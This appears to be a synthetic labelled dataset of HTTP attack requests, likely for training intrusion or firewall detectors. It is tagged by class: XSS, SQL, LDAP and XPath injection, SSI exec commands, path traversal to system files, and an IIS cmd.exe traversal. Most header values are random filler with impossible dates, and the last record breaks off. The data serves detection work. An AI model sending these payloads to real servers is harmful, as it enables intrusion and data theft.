MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic dEFlNm1kMDpoZE9k
Authorization: i6h6 inyEtSLs=s0eHnr
Range: 6652-,-36477,66590-93
Referer: http://aei7zen.cz/nttYshc/eQsa1/djha2ude/ldpwsf/ovtrty3.jpg
TE: gzip;q=0.5
Trailer: Expect
User-Agent: yecagesEsN (j5q_8co@X-; lKC@.SO; r@qT-G)
UA-CPU: StrongARM
UA-Disp: 527,703,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 349x5070
Via: 6.3 www.isUmifr.jpeg, HTTP/2.8 www.ohw2g.jpeg:1
Transfer-Encoding: 3pir; riee=oetd
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 175 www.izidyp.gif "ortoaehswe5tr" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43920
Start - Id: 49381
class: XPathInjection
GET /7E0OiitetdogeoAcjeew/iusDVrFSiiaDv-hOtuv/In/sJNlogcopyYoGfEO/tcsyeejwe0i.jpg?dmR6Uentndtenih=9570305432&77y0s=clocationzeh6i&Q-k_7P_5fj=tE.&EnwuDXFUE=y94r5t7eydtkM&fk=6rs5a%2FmggOh%2Foptet%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D038%5D++++or++%27Ar%27++++%3D+++%27&dloclcSaibptt8=i%26&Onvsoriblnde7kA=160730813&osraueddmln=93&e8sea1O=etoRtc&TxJzU1Iperl=9914&nqul=4&QEWe3MEtz3Ax=eEic9rle&6uen8F=TqscriptACt6upositionu+ied+&holohpnujuieta=iEOrpPdlMwEsK&etc3ev=eawp HTTP/1.1
Host: 105.158.21.118
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-roman;q=0.6, x-mac-arabic
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: Eo='d9stet'
Client-ip: 227.191.80.33
Cookie: oThvslw=71;gi7rrmsru6=l9e;tee=ryhd3;sttMnel=seetl(iti;eeBomresiac=u\sa~tkrt
Cookie2: $Version="66"
Date: Mon, 24 Dec 07 12:58:13 CET
ETag: "8EMWsrpgGBvHJnZ9p9om"
Expect: 0sTS
From: otln@tpiaietAi5.st
If-Modified-Since: Sun, 20 Jan 08 19:44:22 GMT
If-Unmodified-Since: Mon, 31 May 04 13:01:45 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0777
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: gWoe no1msa3=apmn
Authorization: nae8oa ufesao=bnthuhs
Range: 6-,-18019
Referer: http://www.edAoa.org/a8r6s.png
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/0.4 (Machintosh; U; Mac OS X 9.0; 5s-eu; rv:6.2.8) Gecko/81460472
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0695x2392
Via: FTP/5.0 www.og9nrsr.gif
Transfer-Encoding: deflate
Upgrade: peor/1.1, d2rrnr/4.2
Warning: 968 150.103.51.182:94997 "eidcatleEean" "Fri, 27 Aug 04 02:02:34 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49381
Start - Id: 46853
class: XSS
POST /taV3kFY8k5/tnpdbdceieitootCun/a3R_/h3trbwtSEops/hEDUzh3m/eaJN/uorokmawSTxRoiueteeu/bRce537hrdnem/iIQX.sh? HTTP/1.0
Content-Length: 261
Content-Language: EaraoHta
Content-Encoding: compress
Content-Location: http://www.entd.org/u99htn.jpg
Content-MD5: bWxhc2Fhc2dzd3RybmVldQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Dec 08 23:37:27 CET
Last-Modified: Fri, 14 Sep 07 24:03:33 GMT
Host: 74.223.82.100
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew, windows-874, windows-1255;q=0.5
Accept-Encoding: 
Accept-Language: r0wsti-ea86caes, el7wai-fj;q=0.7, n6ai-ddFah;q=0.3, e-p;q=0.4
Cache-Control: max-age=2
Client-ip: 116.169.8.10
Cookie: i8whe=9262271130;rhttqp8ekioiii=909946;ia3auhsEt=3tTs4 
Cookie2: $Version="455"
Date: Thu, 24 Aug 06 20:37:00 GMT
ETag: "HTJvF.2qTzNngibZ14mg"
Expect: eounOo
From: eisopAa@s6qldnnaej.be
If-Modified-Since: Fri, 30 Jun 06 08:08:30 UTC
If-Unmodified-Since: Tue, 29 Jan 08 19:51:14 GMT
If-Match: *
If-None-Match: *
If-Range: "6sO-vtbv@JccBBHjrBA"
Max-Forwards: 0
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="5iwrlmu"
Authorization: Basic ZW9sSG86dHVvYWE=
Range: 11334-,-933
Referer: http://www.uses4n.com/ecoroo2T/u1mqe/eetsh/iqaoAhab/iAmfwyre.fgf
TE: gzip,trailers
Trailer: Referer
User-Agent: Mozilla/3.2 (Windows; U; Win98 4.8; xn-iN; rv:5.7.7) Gecko/44466587
UA-CPU: x86
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 758x384
Via: 8.4 108.98.40.193, 9tei25/4.2 95.32.248.29:3614
Transfer-Encoding: gzip
Upgrade: ccSen/7.1
Warning: 762 95.205.191.87 "fohr1e" "Mon, 03 Aug 09 24:53:41 UTC"
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lNo=233&6Ok=741265&tiooeM5diVgf6h=H+&llwaie6N9L=rmutopOe&m5=5786901&JxAhomeinE2=o e$li'epetg<u &42=miy4ux5tnPh&anfAu=ira&evdaeareaothr=0508656930&moea7ko=lnil&f3uzoPrWtw=slne6 onload=javascript:alert  (sfeta0.t6AtDS7hdhUmco)&o8ni5iat9tt=7t(tqy

End - Id: 46853
Start - Id: 40295
class: SSI
GET /titest/mbV@CS748lr_zcBs52/dtSK3PvVwEoTE1Mxy/q7Z/cWfa/ZRUo-0positionIyMPIG/aODPWBY4lNL3p/oGui/gj8u1W1pYzcbW/A4s9npAnhAytd8sI/t2yr1rfaneha.cfm?IuKZJ_=%3C%21--+++++%23exec++++cmd%3D%22c%3A%5Cprogra%7E1%5Cyhgrzo%5Cisrtach0%5Cenf2c.exe+++d%3A%5Ch9%5Cwww.elelnitais.org%5CsvuHatimr%5Cdatabase.mdb+%2Fx+exporttofoxpro%22--%3E&fgn=81&vgd=zUo54rF&wtmtle6eo=34 HTTP/1.0
Host: 35.206.241.198
Connection: close
Accept: */*
Accept-Charset: x-mac-roman, x-mac-korean, iso-2022-kr, hz-gb-2312;q=0.6
Accept-Encoding: deflate;q=0.8, deflate, compress, identity
Accept-Language: f-3i;q=0.4
Cache-Control: no-cache
Client-ip: 27.205.84.231
Cookie: leeisrU4a=bMw8-5r1u2_;adfdhv6M=~ser@;psst=dyJ2wiIA;hcdheAHneqtNzi5=teglo3f4i;thp9th=nebin4boot.inifZAkm'j;rnsbva=hhl2sgrzexeoki
Cookie2: $Version="973"
Date: Sat, 26 Dec 09 05:56:30 CET
ETag: W/"cZahXkYy1L59OAb"
Expect: 100-continue
From: sinl@n3biht.ch
If-Modified-Since: Tue, 06 Mar 07 04:24:20 GMT
If-Unmodified-Since: Wed, 18 Jan 06 21:20:37 CET
If-Match: "CZPNhKVbIgoCdwXQbhx"
If-None-Match: *
If-Range: "PHyY9dc1tgh1y@K"
Max-Forwards: 46
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: oeos goaweqW=tqMehbrx
Authorization: Basic ZGFrRmVvY286c2EwZQ==
Range: 5-
Referer: /eieoxrs/ofase/aictno/st1nhnt.dll
TE: trailers,deflate
Trailer: If-Match
User-Agent: Mozilla/5.5 (compatible; MSIE 0.5; Solaris; oe1qdnmeci; t4e16trh)
UA-CPU: MIPS
UA-Disp: 2515,7751,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2184x777
Via: 8.0 www.aEltsa.jpeg, HTTP/7.9 46.135.1.61, 6.5 202.112.245.234
Transfer-Encoding: ramO
Upgrade: hiCkrp/2.9, tclcr/7.7, ntp5/3.3, her/1.8
Warning: 559 www.x4kdcw.js "6b1la22lnngto" 
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 475557970524
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40295
Start - Id: 37865
class: LdapInjection
GET /e8o/xtf.bin?UQfrphaccept=oeget0sos%24tw&dErwaisti=odlsIeedmhdhHrxs&Uetmno9r=ns8yuphpetaer&lms=377329&93iceoua8eet=ugeea%29%28%26%28objectClass+%3D++nsA*%29&e0uhe5a=d1oboot.ini HTTP/1.0
Host: www.admesw.be:6
Connection: close
Accept: text/xml, application/*
Accept-Charset: windows-1257
Accept-Encoding: 
Accept-Language: yocl5-dtrtmtuh;q=0.0
Cache-Control: no-cache
Client-ip: 242.40.70.141
Cookie: d4eg=oeSjor;urcpsA=eist2siw1t;wesncecehrehi=uud
Cookie2: $Version="7"
Date: Thu, 12 Nov 09 24:05:25 CET
ETag: W/"QGw7GJrbe-NEJrg0bH"
Expect: 100-continue
From: dxmog@eeOtwtfr.com
If-Modified-Since: Tue, 10 Mar 09 19:19:26 GMT
If-Unmodified-Since: Sat, 17 Oct 09 05:57:23 UTC
If-Match: "c6FC5Mm@FvNAWs."
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 4.6
Pragma: ts=rysmnrx
Proxy-Authorization: Atfeo UKet=rucegw
Authorization: NTLM cG1mbHRxRXVpbnI5bHRpb3Rpb2E3d25lYWxkcDRpbnlzb3Q=
Range: 3-43,-454,28574-
Referer: /tfael6T/hcetil/jemh.php
TE: trailers,chunked;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: igWq1SUX http://www.aeeein7n.it
UA-CPU: Sparc
UA-Disp: 8628,0806,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 649x451
Via: iNhtts/2.7 www.Trst.css:6819, 6.8 9.233.253.163
Transfer-Encoding: compress
Upgrade: obeThi/2.4, ems/4.7
Warning: 785 154.219.196.57 "riredam4aosbhnieNsek" "Wed, 10 Jun 09 10:24:56 CET"
X-Forwarded-For: 223.104.48.29
X-Serial-Number: 300384
----: --------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37865
Start - Id: 41235
class: SqlInjection
GET /elirehlfllsth/5aaieonreesedHt/teMl@15/lsXoyOHuo/undeafa0nlefet4ue3T/ememu/_Vlogy6t/g9p63Lta_isD/dHnea9/tma4vcadt1/oNacMTXw4/rP2Jk..jpg? HTTP/1.1
Host: 67.85.198.175
Connection: keep-alive
Accept: image/png;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: 6Ncrn-sjwd
Cache-Control: noonhn=c
Client-ip: 60.161.90.58
Cookie: qzjbgsoundFprocessing-instruction1=67;ch=1aIgerejr;33OdCow2EP=qde4;0eitenasosttvmi=eVu;0e=885;ay0oDrnmseasrr=gi
Cookie2: $Version="6"
Date: Mon, 05 Dec 05 17:02:03 UTC
ETag: W/"bHU.KVU-HPmOIYHv"
Expect: 100-continue
From: zcrNz@rbAtdcsnm.cz
If-Modified-Since: Fri, 01 Jan 10 06:17:44 CET
If-Unmodified-Since: Sun, 15 Mar 09 11:08:31 UTC
If-Match: "1WgZ.-61HqtgfGtHEKDq"
If-None-Match: "jDt-8wOnx6o8MpGzG1"
If-Range: Sat, 03 Jan 09 23:10:29 CET
Max-Forwards: 323
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM ZjA3aWl0ZWlzUjFyZWJlNHRqZWRtc3NyZW91ZWVsaWx0bk5vdGhSdGlyc203bQ==
Authorization: NTLM ZW0ydGV1ZGVtZlJ2YWNhaWJ4OWluYTlFZWRzeGZ5NUxlZXBvdHJh
Range: -50
Referer: /ueii.mdb
TE: chunked,deflate
Trailer: Accept-Encoding
User-Agent: '  UNION      ALL        SELECT     rn    FROM    ritiohewos   WHERE   '' ='
UA-CPU: MIPS
UA-Disp: 016,7142,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8507x042
Via: 0.1 www.rgji.css:924, FTP/4.1 www.schzerE5.tiff, 0.1 173.19.124.43
Transfer-Encoding: gzip
Upgrade: isseep/7.6
Warning: 667 152.172.13.95 "aRhru0iesewyecft" "Tue, 02 Mar 10 13:29:57 CET"
X-Forwarded-For: 143.248.62.11
X-Serial-Number: 2131870805423
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41235
Start - Id: 37102
class: LdapInjection
GET /hr7vV8gaQkKWBwk5L.php4?pca=39899749&7teeRS=%29+++%28++%7C%28displayName%3Dhad*%29+++%28name%3D++++had*++%29%28mail%3Dhad*+%29&eadissveuuersr=79&esd08ysovxct=gumh&tdlko=225586&eitefRdAhebnmqr=%28iHoeanhtpass%28b&g9i3ff=59&0ueigewrrE=cXnSPyX&zoflweahr7N=Ttn HTTP/1.1
Host: www.aee6soro.biz:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: eoi0dS-aqliik, cbsNh-ui82sre9;q=0.1, rstdans-fftx, rrtgy-xy6ker
Cache-Control: max-age=958
Client-ip: 236.39.89.101
Cookie: dojtrcu=/$a+~phtpasslog;t+i4zadmin/catqn;bnsa7maahelea=smeso;nushRiUejnsor1h=ern;wdevk0ecneidn=rRA_Jq;xvxo3hehsoNoI0n=0944143630;h1=o0YbDTdejsx
Cookie2: $Version="020"
Date: Sun, 25 Feb 07 02:58:18 CET
ETag: W/"ex2f5I_0004_3pr7.R--"
Expect: idorit=hhox;9ha3ae=2Vh6e
From: 5cih8hH@th6En.it
If-Modified-Since: Thu, 19 Jul 07 02:03:03 GMT
If-Unmodified-Since: Tue, 24 Apr 07 13:47:50 GMT
If-Match: "@0sTaB9Jcv1mpZiO"
If-None-Match: "kzc8V9ZPhHF2AyTxL"
If-Range: Sun, 09 Jul 06 21:13:59 GMT
Max-Forwards: 64
MIME-Version: 4.7
Pragma: ojrit=ntlh
Proxy-Authorization: Basic ZGk5b2g6bmZpcmU3
Authorization: maessy sOhmS=idhnenqn
Range: 8-29969,-67,432-912142
Referer: /xaE9y/Eonpr/otE2ez/teln/Aroualbt.gif
TE: chunked,gzip;q=0.2
Trailer: Via
User-Agent: reek4to/5.7.9.5.4
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 617x3755
Via: 2.2 197.154.157.20
Transfer-Encoding: 6mna
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 330 www.aiew2aRa.jpg "huTweibwmAEeQpte" 
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 85332942046227560401
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37102
Start - Id: 36012
class: PathTransversal
PUT /yode9Hs0a9qy/y5.js? HTTP/1.0
Content-Length: 255
Content-Language: yao,ijgnsny
Content-Encoding: deflate
Content-Location: http://www.emiz.ch/oe0Lhpsh/rumr/huwr/ur0E.mdb
Content-MD5: aWhUdWVkRXR5dXNlcGVkcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 May 08 21:45:12 CET
Last-Modified: Mon, 12 May 08 08:34:46 CET
Host: www.atte.it
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.8
Cache-Control: no-store
Cookie: 0kiradixeh7hes=locationt)%TtSepvsio E;vt_wTJZZP=2337;OqfromOjaJm3l=owa;aoeastairrdg=t6eT
Cookie2: $Version="1"
Date: Thu, 01 Apr 10 03:23:41 UTC
From: snploe@2Ooln.biz
If-Modified-Since: Fri, 24 Jun 05 02:29:23 CET
If-Unmodified-Since: Thu, 17 Mar 05 15:13:03 GMT
If-None-Match: *
If-Range: Tue, 06 Jan 04 19:07:50 GMT
Max-Forwards: 2
Pragma: 73='h'
Authorization: Digest nc=Fb9cDdB3
Range: 026321-,91891-,-3435
Referer: /mopsob.gif
User-Agent: tgbote (r8PkG0l)
UA-Disp: 764,923,32
Via: 9.1 www.omfutHt.jpeg
Transfer-Encoding: deflate
Warning: 658 108.103.139.154 "Iuht" 
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ok6dep1l=e/&zurGv=2328&Y7wTQlI=18964&oe9ebmibtoot3=fvz-lV&ettEod=mn$os&eL7Rrlurrieae0l=/../../../../../../../Inetpub/iissamples/islede/laatitve/llen/tees.mdb&vajeqdkihns=elQg1V&leeenWi=070&Fwieaayob=as&EhO8saeadeu1=ezHjjrWRsN

End - Id: 36012
Start - Id: 47715
class: XSS
GET /tG2PpHoG4SQZ.U1PmL/nsy.sh?tw8ay1tEsw=5412&ZL_YT_UBm=5328769111&ldsrec4esoi=aqmsEERp&arROnipih0dtr=as%7Eipta8ci&lne=hyorea4Ifq&EFlibyMC40gwinntG=euSIw&4n2hEyosrt=ey&ae2weuf4eko3ie=%3C%21--+--+--%3E%3Cscript%3E%5Balert+%28%27opdftca%27%29%3B%5D%3C%2Fscript++%3E%3C%21--+--+--%3E&reGnsmsnuu=nrYelmNqtJw&qk=n+ytlsdcwd%3B+s1norcph6r&cehsmj=%3Dd6ntssdww%25%28+pwhere&cben9y3s=ipE.fg&Sugbyr=4947699782 HTTP/1.0
Host: 116.124.193.190
Connection: ornfordh
Accept: video/mpeg, video/*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=7180
Client-ip: 245.204.137.49
Cookie: HeeamatrenbnE=659
Cookie2: $Version="6"
Date: Sat, 20 Mar 10 09:15:54 CET
ETag: "o8srXj_tTzX-96_kyD"
Expect: eAkt=es3Stmno
From: Nhksen@i9nwketoNw.gov
If-Modified-Since: Tue, 02 Nov 04 09:16:53 CET
If-Unmodified-Since: Mon, 13 Dec 04 11:24:05 GMT
If-Match: "BYTrcd.j4UI.-dy"
If-None-Match: "E5U1J-OzlrX306G"
If-Range: Mon, 17 May 04 01:21:28 CET
Max-Forwards: 9247
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM b2lyb3Rzb2hiYXBpbGlhbkxBZ2hkdWVybWx5b2hjdnNyZXJjZVRoc2F0aEdqaU8=
Range: 2174-,56-,-57382
Referer: http://stetWkt.biz/ns6ooex/brata/ovspiP/idEbrt1O/b95iS0.gif
TE: chunked;q=0.6
Trailer: Date
User-Agent: Mozilla/3.7 (Windows; U; Windows NT 6.9; Ia-ra; rv:7.5.6) Gecko/56922995
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5167x472
Via: 6.0 www.gem9.js, 4.9 68.33.210.1:260, djl/9.9 www.m5ord1.html
Transfer-Encoding: qpthd; ttespalb=ifriac
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 328 www.rri2Tey0.htm "ndrOro" "Wed, 18 Nov 09 04:33:59 UTC"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47715
Start - Id: 39234
class: SSI
GET /ooidertClmae0itgt/oue/owx.cgi?FmlBJ.2=ttW&s4anU=h5UitQ75te5EirFee&uHseretwiw55sh=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.1
Host: 147.41.28.50
Connection: ruigOg
Accept: image/png;q=0.6, image/gif
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.9, compress, identity;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 115.187.210.122
Cookie: aspaqs7lOloevmo=qre7estat;aiJ11=3Q_O@fZ
Cookie2: $Version="798"
Date: Mon, 04 Feb 08 07:11:52 UTC
ETag: "4WITdI0tQXVWOMUbkat"
Expect: 4Wjptccc=ocny3
From: lyrtrai@3atnetodh4.net
If-Modified-Since: Wed, 14 Apr 10 16:52:30 GMT
If-Unmodified-Since: Tue, 05 Jun 07 14:37:29 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Nov 09 06:20:06 UTC
Max-Forwards: 840
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic c2ltMjpzYWdlYjVhYQ==
Authorization: tnehsR oeivpo=oehots
Range: 5-9725,-6683
Referer: /amaNen/nhacDclr/eser/tA2eNr9/er2Hs9so.jsp
TE: chunked;q=0.6,trailers,trailers
Trailer: Date
User-Agent: oxDYDZh1J1 http://www.montlxi.de
UA-CPU: 68000
UA-Disp: 274,6270,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 833x510
Via: 9.6 35.62.81.245
Transfer-Encoding: compress
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 173 103.13.38.123 "ncwbefh" "Tue, 25 Oct 05 02:27:19 UTC"
X-Forwarded-For: 252.9.253.184
X-Serial-Number: 157624
----: ---------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 39234
Start - Id: 44653
class: PathTransversal
GET /IfM6p51MPM5UYOiframe/iDzniyrnasamhiOreee/Mmjn1t_rpassthrut/42V@/aaraofIinsoss/oStb6eaE.swf?Fz=dozani&eiEmut8hh0t4em=i%24e&ef6vow=eodth3tisaasock_stream&hm=D8mh8coli&WXRuJkM6P=1170689&9nd9=EleiRiboen&yEpq=l9deMtoaikbe HTTP/1.1
Host: 150.87.161.53
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: file:///6:/aS/Eeoee/e1ir.xml
Cache-Control: no-store
Client-ip: 148.231.144.16
Cookie2: $Version="638"
Date: Tue, 26 Apr 05 23:19:27 GMT
If-Unmodified-Since: Sat, 07 Jun 08 17:39:35 GMT
If-Range: *
Max-Forwards: 8
MIME-Version: 2.5
Referer: /qdsT/3sic/aeori/uhhf.jpg
Trailer: Referer
User-Agent: ylbthrmet (tSVRWx)
UA-Disp: 0008,0570,16
Transfer-Encoding: deflate

null

End - Id: 44653
Start - Id: 40925
class: SSI
GET /VNiN/aeLA5-/cgLrVKoW.CLbT91jnN/z8xr90p9w/tzVJF._0hVaprh/-h8R0haccess_logGd/tesRm0vIx/8y1setoeeAnhten/delete4taQhu_0.nsf?chd2tebetNe=ptieietasoffue0v6&sTrhd=otr5sdsraweeAnt&e6rerbya=uaopn&eTAwr=3965&tle5s=7aeYl-&8YGrAOnub9a1=%3C%21--%23odbc+++++statement%3D+%22select++cehod%2C++++utne3EeN%2C++1udlwn+from+++rsthwR+++++order+++++by++++9%2C+++++90%2C+9%22+--%3E&Tnnhadsalflchta=25&ta0Rhtiexi=nmdgcgs&psSFsGQzW=6p_sjs&f8neo=70 HTTP/1.0
Host: www.eepxyrtd.it
Connection: close
Accept: */*
Accept-Charset: koi8;q=0.0, isiri-3342, iso-8859-5
Accept-Encoding: *
Accept-Language: eoqat-c81eb4N
Cache-Control: no-store
Client-ip: 164.186.250.7
Cookie: t6=rci;N2rG=2588075
Cookie2: $Version="5"
Date: Tue, 09 Mar 10 12:54:13 CET
ETag: W/"8masr5MiUJT4dyo4siJ"
Expect: nBhmshg
From: tmenra3@rdaoespvt.it
If-Modified-Since: Wed, 18 Apr 07 06:18:05 GMT
If-Unmodified-Since: Sat, 05 May 07 06:00:20 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Oct 04 15:11:14 GMT
Max-Forwards: 32
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM aWZiaDZzRWVmbzBldHg0YmNla3d0dGUybmVpb3locDRpZndvcg==
Range: -61
Referer: /tabaw/lisas/ctsyZH/strirer3/isnae.gif
TE: chunked;q=0.8
Trailer: Accept
User-Agent: Mozilla/3.3 (Machintosh; U; Mac OS X 2.4; 3o-yf; rv:0.7.0) Gecko/90868463
UA-CPU: PowerPC
UA-Disp: 613,8082,8
UA-OS: Linux
UA-Color: color16
Via: HTTP/4.8 www.Y1gmuueo.css, FTP/9.7 19.69.213.154
Transfer-Encoding: compress
Upgrade: datbe/5.7
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 60.122.216.106
X-Serial-Number: 163741114628927
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40925
Start - Id: 44448
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 122.182.109.236
Connection: close
Accept: */*;q=0.8
Accept-Charset: us-ascii, x-mac-icelandic, x-mac-greek, us-ascii;q=0.7, euc-kr;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 241.65.49.103
Cookie: etgwdCuaiun=y 
Cookie2: $Version="65"
Date: Sun, 11 Jan 09 01:40:01 GMT
ETag: "wXABuvWhF059r7z."
Expect: o7hpoac
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Tue, 22 Mar 05 11:16:42 UTC
If-Unmodified-Since: Tue, 18 Mar 08 14:46:23 GMT
If-Match: *
If-None-Match: "qF5-eW-NJOE6tF53K"
If-Range: "pKxjn-Kc8p48VK2m2L"
Max-Forwards: 4189
MIME-Version: 1.4
Pragma: Srea='efh'
Proxy-Authorization: Basic aWVzODp5ZWh5aQ==
Authorization: Basic d3JjTHplNnI6Z241c25l
Range: 6-02287,72753-
Referer: /Nlrn5a.rar
TE: chunked;q=0.0,deflate;q=0.2,deflate;q=0.1
Trailer: Referer
User-Agent: Mozilla/0.9 (compatible; MSIE 0.1; Linux i386; 3hitrHt)
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 053x237
Via: HTTP/1.2 103.185.139.157
Transfer-Encoding: gzip
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 817 97.27.246.180:97 "fri3lee1seear1g" "Thu, 29 May 08 16:18:48 GMT"
X-Forwarded-For: 0.187.253.54
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44448
Start - Id: 41193
class: SqlInjection
GET /mewxieiy9SdSerrSah.cgi? HTTP/1.1
Host: www.itnsuuzoz.org
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: koi8-r;q=0.5, iso-8859-3
Accept-Encoding: '  union     select   @@version,1,1,1--
Accept-Language: 4-ea
Cache-Control: only-if-cached
Client-ip: 5.118.118.210
Cookie: fhuV=423276
Cookie2: $Version="3"
Date: Fri, 17 Feb 06 23:29:31 UTC
ETag: "ThY1cTTEqxmOVuYl"
Expect: ewi8imt=Eenc
From: hnrnbiad@nJninesrqA.biz
If-Modified-Since: Mon, 06 Feb 06 05:55:25 UTC
If-Unmodified-Since: Wed, 23 Nov 05 24:59:04 CET
If-Match: "jnksdr871tGvO5vo"
If-None-Match: "IDvKLHD.HOVml1XGxW"
If-Range: Sat, 04 Sep 04 02:04:44 CET
Max-Forwards: 47
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic dGxzUDpoZW92aQ==
Authorization: Basic MWl0aWE6MGw0dGNhdA==
Range: 0731-3915
Referer: /euw4YT0o/mrejr.swf
TE: trailers
Trailer: From
User-Agent: Mozilla/0.0 (compatible; Konqueror/2.5; Win98; caht4rna; uf2fg)
UA-CPU: MIPS
UA-Disp: 8221,0714,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9560x6945
Via: torvoA/6.2 www.yDo8s.tiff
Transfer-Encoding: identity
Upgrade: eijtn/6.7, lQnT/6.1, aomess/4.2, rhpltp/2.7
Warning: 985 www.enaw.tiff "drga" "Tue, 12 Feb 08 13:07:34 CET"
X-Forwarded-For: 247.67.228.93
X-Serial-Number: 7584461693588
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41193
Start - Id: 36259
class: PathTransversal
POST /toaitrbqus/EsiImz8s3rtorscoyOy/rRiTl59zjb20L/dhkcrjn2e8d.cfm? HTTP/1.1
Content-Length: 319
Content-Language: Rh5i,rwx
Content-Encoding: compress
Content-Location: /qopouDrd/uccjictu/sxmh/i7itoRqs.conf
Content-MD5: aGRuSWFTb2VraHB0Nm5pdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 09 Mar 04 06:59:31 CET
Last-Modified: Sat, 22 Mar 08 19:04:52 GMT
Host: www.t0roee.be:085
Connection: eeosdo
Accept: text/plain, video/quicktime, image/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 112.174.108.236
Cookie: rNopadbwagmeo2t=eIlM;9tginmnP=qK11jFCRb;1irss0ovoik=oeweeunthunOs;KtNQwEJOMRB=6
Cookie2: $Version="6"
Date: Thu, 26 Nov 09 06:27:34 GMT
ETag: W/"ajx.F7yjkUqvV9i"
Expect: eigacm=eafotax;3ngniEI=1owL6ot
From: tarcw@rtJihd7rad.st
If-Modified-Since: Thu, 06 Dec 07 08:27:36 UTC
If-Unmodified-Since: Tue, 21 Mar 06 13:19:29 CET
If-Match: "kRIZOq9LqOFAQ_5YHF_"
